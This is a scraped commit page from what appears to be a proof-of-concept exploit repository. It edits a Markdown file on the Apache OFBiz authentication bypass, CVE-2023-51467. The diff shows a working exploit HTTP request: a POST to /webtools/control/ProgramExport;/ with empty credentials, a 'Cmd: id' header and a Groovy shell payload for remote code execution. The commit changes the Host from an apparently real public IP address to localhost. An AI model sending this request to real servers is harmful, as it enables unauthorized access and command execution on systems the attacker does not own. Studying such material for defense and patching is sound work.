admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update Apache OFBiz 身份验证绕过漏洞 (CVE-2023-51467).md

Browse Source
This commit is contained in:
wy876 2023-12-30 16:24:12 +08:00 committed by GitHub
parent d675909262
commit 66921aa1f9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
Apache OFBiz 身份验证绕过漏洞 (CVE-2023-51467).md
View File

@ -38,7 +38,7 @@ groovyProgram=import+groovy.lang.GroovyShell%0D%0A%0D%0AGroovyShell+shell+%3D+ne
## exp ## exp
``` ```
POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1 POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 1.214.41.74:28080 Host: 127.0.0.1:28080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
Cmd: id Cmd: id